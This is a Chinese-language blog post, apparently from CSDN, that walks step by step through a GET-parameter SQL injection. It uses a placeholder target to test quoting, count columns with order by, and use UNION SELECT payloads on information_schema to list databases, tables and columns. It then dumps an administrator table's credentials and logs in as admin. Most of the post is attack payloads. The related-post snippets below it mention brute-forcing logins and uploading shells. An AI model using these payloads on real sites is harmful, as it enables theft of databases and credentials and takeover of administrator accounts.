GET注入流程

最新推荐文章于 2023-05-29 10:58:36 发布
最新推荐文章于 2023-05-29 10:58:36 发布
阅读量206 收藏
点赞数 1
文章标签: php 开发语言 数据库开发 服务器 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43276394/article/details/126484428
版权

漏洞产生原因:

  • 参数可控,比如更改参数页面会变换

  • 参数能带入数据库查询

先改变参数比如

www.xxx.com/view/xx.php?id=1     

www.xxx.com/view/xx.php?id=2 变化和1不同说明参数可控
www.xxx.com/view/xx.php?id=1 and+1=1

www.xxx.com/view/xx.php?id=1 and+1=2  如果没报错,说明我们这句话没有放到SQL语句执行

测试如下判断外部符号
www.xxx.com/view/xx.php?id =1'

www.xxx.com/view/xx.php?id =1"

www.xxx.com/view/xx.php?id =1')

www.xxx.com/view/xx.php?id =1")

接下来按照外部是单引号的情况举例

使用 ?id=1' 操作语句 -- a

1.首先操作语句应该需要用来判断列数使用order by

www.xxx.com/view/xx.php?id=1' order by 11 -- a

判断列数,需要使用二分法 注意id=1

2.判断回显位置 因为sql语句显示报错内容为limit 0,1说明只显示一个内容,需要让id=-1'才行。

www.xxx.com/view/xx.php?id=-1' 
union select 1,2,3,4,5,6,7,8,9,10,11 -- a

3.替换回显位置,比如这里是2,3,4回显数据

www.xxx.com/view/xx.php?id=-1' 
union select 1,database(),version(),user(),5,6,7,8,9,10,11 -- a

4.接下来查询服务器上所有数据库名字  使用information_schema数据库

www.xxx.com/view/xx.php?id=-1' 
union select 1,group_concat(SCHEMA_NAME),version(),user(),5,6,7,8,9,10,11
from information_schema.SCHEMATA-- a

5.接下来要去获取对应数据库中的表名 group_concat(table_name)

www.xxx.com/view/xx.php?id=-1' 
union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11
from information_schema.tables 
where table_schema='数据库名字'-- a

6.分析表       举例:

  1. 经过分析:roots 很有可能是管理员表, goodsuser很有可能是商城的用户表

  2. 要想知道roots表中的字段名,需要使用information_schema这个库中的COLUMNS表

  3. 其中:

    TABLE_SCHEMA:数据库

    TABLE_NAME: 表名

    COLUMN_NAME: 列名

www.xxx.com/view/xx.php?id=-1' 
union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11
from information_schema.columns
where table_schema='数据库名字'
and table_name='roots'-- a

7.此时已获取roots表的字段,我们需要将这些数据读取出来

  1. 字段1,字段2,字段3对应相应表头,比如userName,userPwd,id等

  2. 字段过多但是回显位置不够时,分几段语句截取

www.xxx.com/view/xx.php?id=-1' 
union select 1,字段1,字段2,字段3,5,6,7,8,9,10,11
from roots-- a

8. 可以通过之前信息收集的login.php登录管理员账号测试

ccohi
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
java 通过GET请求暴力破解密码
qiye622的博客
09-03 1135
一、原理 GET请求会将参数放在URL中,如果通过GET请求登录,则会将用户名和密码放在URL中进行发送,此时我们可以通过构建URL来进行测试登录,并获取到返回的数据,来判定登录结果,来达到爆破的结果。 二、思路 我们需要通过socket的方式进行连接,并准备用户名和密码字典,依次取出字典中的值,通过两个for循环,用外层用户名,内层密码的方式构建URL,再依次发送,并接收返回的数据,判断登录结果。 此时需要注意的是,在发送了请求后,判定登录失败,则需要关闭socket,并重新建立socket进行下一次登录
简单GET注入(数字类型)
await_9的博客
07-06 763
第一步:判断是否有注入点,利用 ' 进行回显显示第二步:对数据类型进行判断,判断是否为数字: 显示正确; 显示错误;第三步:对数据段落进行判断,判断有几个字段 注:当回显出数据时,就是字段数第四步:回显出可显示的字段位置 注:回显出的数字就是下一步更改代码的位置第四步:对可以回显的字段进行判断, 注:利用user(),database()可以查询当前使用的用户与数据库第六步:对当前数据库进行查询表 注:security就是上一级查到的数据库第七步:利用查到的表对字段进行
Python编写简单GET暴力破解
qq_50620293的博客
03-24 889
最近简单学习了一下python的request模块,虽说简单,但值得实践一下,记录一下过程 靶场为dvwa简单难度的暴力破解模块 python中的request包可以对网页发送请求以及接收回应,再结合循环,以此作为暴力破解的基础 第一步,获取url 首先dvwa的暴力破解模块是get请求,所以直接先随便提交一组数据,复制它的url即可。(post暴力破解之后再做研究) http://127.0.0.1/DVWA-master/vulnerabilities/brute/?username=admin&amp
SQL注入GET参数注入(提权版)
2303_76679642的博客
04-23 614
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
实验:学习GET注入
茶花语的博客
02-25 4943
使用sqlmap工具,基于GET请求的SQL注入实验
SQL注入--get注入
weixin_52151447的博客
11-11 2399
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
php学习流程
01-03
6. **预定义超全局数组**: 了解如何使用像`$_GET`、`$_POST`这样的超全局数组,以及如何防止SQL注入和处理中文乱码问题。 7. **文件编程**: 掌握文件操作,如读写、流处理和常见文件函数的使用,实现网站计数器。 ...
DATABASE_do.rar_流程
09-23
`PreparedStatement`更安全,因为它能防止SQL注入攻击,并且适用于需要多次执行相同SQL的情况。 ```java String sql = "SELECT * FROM table_name WHERE column = ?"; PreparedStatement pstmt = conn.prepare...
PHP注入工具 2.1
02-24
9. **持续集成与持续监控**:将PHP注入工具2.1集成到持续集成/持续部署(CI/CD)流程中,可以确保每次代码更改后都进行安全检查,及时发现并修复新出现的漏洞。 10. **教育与培训**:除了工具本身的使用,了解注入...
多种注入中转 cookie put get...
01-24
数据注入是攻击者通过输入恶意数据到应用程序,以改变程序的正常流程,从而获取敏感信息或执行非授权操作。常见的数据注入类型包括SQL注入、XSS(跨站脚本)注入和命令注入等。 - **SQL注入**:攻击者通过在输入...
dede批量Getshell
10-31
7. **攻击者的操作流程**:`说明.txt`文件可能揭示了攻击者实施攻击的具体步骤,包括如何部署恶意文件以及触发Getshell的条件。 对于网站管理员来说,了解这些知识点至关重要,因为他们需要定期检查和更新CMS,修补...
SQL注入漏洞-GET注入
HacHunter的博客
03-05 2886
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
SQL注入:union注入学习笔记整理
spongbob1的博客
11-22 1736
union注入即为用union联合查询来查询指定的数据,需要根据每一步的返回结果来判断和进行下一步操作。此仅为个人的学习笔记。 结构 联合查询的语句结构基本为: select a from b union select c from d where e; union会一次显示两个查询结果,使第一个查询语句作为正常内容,第二个作为查询语句来进行构造。 第一步:判断类型 数字型判断 共分3步判断步骤: 1.加单引号,如输入id=1’,对应的sql为:select * from table where id=1
DVWA-----SQL Injection(SQL手工注入
m0_65712192的博客
11-21 6014
DVWA-----SQL Injection(SQL手工注入
SQL注入(一)-基础
最新发布
qq_47848569的博客
05-29 1592
sql注入
SQL注入实战
qq_44915227的博客
04-17 1799
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
SQLI-LABS(二)
weixin_52398420的博客
11-26 281
SQLI-LABS(二) 前四关流程: 1、判断是否存在sql注入漏洞 2、使用order by 查看列数 3、使用联合查询判断回显位置 4、在回显位置处注入sql语句进行查询 **我们可以在sql文件中每一关文件中的index.php中写入代码 echo $sql; echo “< br >”; 以方便做题时查看sql语句; ** Less-1: ** 1、判断:?id=1’ 在这里插入图片描述 出现报错,证明存在sql漏洞,其中 报错信息 为’‘1’’ LIMIT 0,1’ at line
web渗透部分笔记(一)
学吧
06-20 451
web渗透笔记
sql注入
qq_52108058的博客
11-03 855
经过对表中字段的查询发现,该admin表有三个字段,id、username、password。发现有一个admin用户,在通过limit 1,1查询第二用户为空,则只有一个用户。(可以理解为从数据库提取的数据被显示在前端)可以在第二个字段处显示我们想要的内容。发现的第二个字段处为。
sqlmap使用详解:自动化SQL注入工具
手册详细解释了sqlmap的功能和操作流程,包括它如何检测和利用不同类型的SQL注入漏洞,以及支持的数据库类型。" sqlmap是一款自动化工具,专门用于检测和利用SQL注入漏洞。当你提供一个URL给sqlmap时,它会执行一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ccohi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值